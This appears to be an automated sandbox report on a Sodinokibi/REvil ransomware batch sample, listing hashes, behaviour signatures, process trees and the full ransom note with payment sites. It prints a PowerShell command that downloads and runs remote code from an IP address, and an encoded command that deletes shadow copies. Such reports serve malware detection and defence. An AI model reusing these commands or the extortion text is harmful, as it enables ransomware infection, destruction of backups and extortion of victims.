Analysis

  • max time kernel
    117s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    07-08-2020 13:10

General

  • Target

    0a68667f99524ab8520068fdbbed1678.bat

  • Size

    221B

  • MD5

    cefe88b45a372f35cb4fffccfe53cbe0

  • SHA1

    b3674eae09ae4b809ee9996ace3983b9a19a67b8

  • SHA256

    2205a70334b25bffd2fd640431ead8e205972aec23afb40445acc07551125122

  • SHA512

    e52d33a82535394ef297031ff5c51169c0859959c6b043f8f6ff33eb93cf5e0750f07060e8d36f3a47248ce9770a632313cc15544c3c2343c78d08701fcb23f0

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/0a68667f99524ab8520068fdbbed1678

Extracted

Path

C:\lu3p18it-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension lu3p18it. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/178BCB8E629819B6 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/178BCB8E629819B6 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: UW61ljj/j8aRgVB+mL+RD7YSc1qZz+s0gsXHoPJdns826+2awFA8//qy5XUSUJ7K hPgW/yV0mGjpCIQ1zh/WgeP+gz7wU9wlrfRP2aC0Kajnvlz46W9DYBDp61MsjIm3 gzPN38ouyJjHL0eZ/3ykLVdPIp6aGM/60piXijWYCJpM7sJMO8klxl4A+VtuOXjp QbHA80xeSkf1qTgj7swt1Jgb00L4lMLHxpdWy0983mq9mN9uma9/QxZVJd1XdScM akKOnL1wzgVbqaTLwKR3uzgDmSgwbxvxlOFfmiQ1ZHrtk6m0jBWu6f1fYQyBuqPU tmOPh/q0JPnu6+Chn4iVEboVQKPDJs5Yv3TxQKlNV2rWUfLpil27dbO8q0+5oFyC 6pI4J5GEMRIBfA+78IZHFzj9OLtlxBBQaJddYlghxewz2OsB+KCP1nh3tnVef0P7 XlGmwPEsHDl/nl0tqLWRjamnjR/7ZbmH7A/YZVR3l0M3tmICvpIXrIsT4h81bScH wN4wXxBTnpNY639Q9/WE6sJforj/Dsasg2YurYxJysedexVdzAgx+Ye5F0KenNT5 ZIuxzCzXoMaKuhyWlBx6EQ02zxDGjP2A9lLndnCkCFY1zzSa3KCqmVgZYiros2Hw Bj5HwmEV5hyiUviNWSQTMbiUZQBg6NKz6ehv0YWPXzAWpH+2h5UCjWngWOMRAnP/ 4usop1T2if8j3IuJumHZFfwRFFEhQ+7ZW6PO/AJrByVgXpGO9UWCHZPtNpyDGacF WdHHvJf0Cygj6iuNq4R2QhbKKaU7ZguJciV0DvKRCPDej1ox75p160Oy+ClxSxGt 4Sa2hLZxpfZFS5zBXLpF+FUEx+DnB0jgwW/QcWOYIiGjzYr7yJjBOAlofWZyaQG7 zjiQF2ntxuYD8RO+RaV+QwIwqvDU9bgPpTigXRC+6FLGEykCJlc8Fhn9YFP9Q1XK IU80i/Mk1clB36HBK8cVBU139WLgySpM18M5BnjRqnRdp4CGYZO/O7HLoWv+U3EM xQSZ0ihgH/0hwSbAvvUhNfJWAa4aqATAeXZIjfInsj1rHU4qb3VAG3tmYMEuweqS qa3ohC5zcr6JOMsbSgeH7RZW8BZ8xpGCbUjiDSVUaXT876EWWkCNc+VvSsVbnK5d I5Pz2MCngZRTV3DAQJjgq5YJ4BogupIzCtiT4P7HIViI41KO3hMVJ6rzrERl5A3I D3CVwJBCnBf4w/NltMHwqELBKmC/nQ/fGK+xkFoqKLPR30FUw2OCYZ9Lr0LrgXGb F93RyLoGlC2byDe8bb9UPRV6lixW6A5ojBTN5aszxYUx+4Gq ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/178BCB8E629819B6

http://decryptor.cc/178BCB8E629819B6

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Blacklisted process makes network request 120 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 24 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops file in System32 directory 1 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\0a68667f99524ab8520068fdbbed1678.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1124
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0a68667f99524ab8520068fdbbed1678');Invoke-BRJMSJCEJYRPOF;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Modifies system certificate store
      • Modifies extensions of user files
      • Drops file in System32 directory
      PID:824
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1688
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1640

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/824-5-0x0000000002810000-0x0000000002811000-memory.dmp

    Filesize

    4KB

  • memory/824-21-0x0000000005990000-0x0000000005991000-memory.dmp

    Filesize

    4KB

  • memory/824-22-0x00000000063E0000-0x00000000063E1000-memory.dmp

    Filesize

    4KB

  • memory/824-14-0x0000000006350000-0x0000000006351000-memory.dmp

    Filesize

    4KB

  • memory/824-13-0x0000000005830000-0x0000000005831000-memory.dmp

    Filesize

    4KB

  • memory/824-8-0x0000000005740000-0x0000000005741000-memory.dmp

    Filesize

    4KB

  • memory/824-0-0x0000000000000000-mapping.dmp

  • memory/824-4-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

    Filesize

    4KB

  • memory/824-3-0x0000000004900000-0x0000000004901000-memory.dmp

    Filesize

    4KB

  • memory/824-2-0x0000000000980000-0x0000000000981000-memory.dmp

    Filesize

    4KB

  • memory/824-1-0x00000000741F0000-0x00000000748DE000-memory.dmp

    Filesize

    6.9MB

  • memory/1688-23-0x0000000000000000-mapping.dmp

  • memory/1688-25-0x00000000741F0000-0x00000000748DE000-memory.dmp

    Filesize

    6.9MB